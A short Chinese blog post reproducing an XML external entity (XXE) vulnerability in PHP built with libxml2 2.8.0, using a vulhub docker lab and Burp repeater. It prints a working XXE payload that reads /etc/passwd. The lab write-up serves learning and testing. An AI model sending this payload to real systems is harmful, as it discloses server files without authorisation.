0
点赞
收藏
分享

微信扫一扫

PHP环境 XML外部实体注入漏洞

小黑Neo 2022-03-12 阅读 91

漏洞描述

libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。

影响范围

libxml2.8.0版本

复现过程

使用vulhub

cd /vulhub/php/php_xxe 进入目录

 docker-compose up -d 启动

访问

抓包,刷新一下页面就行

发送到repeater

进行修改

在最后增加上这个代码

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE xxe [

<!ELEMENT name ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root>

<name>&xxe;</name>

</root>

这样就获取到passwd的值了

举报

相关推荐

0 条评论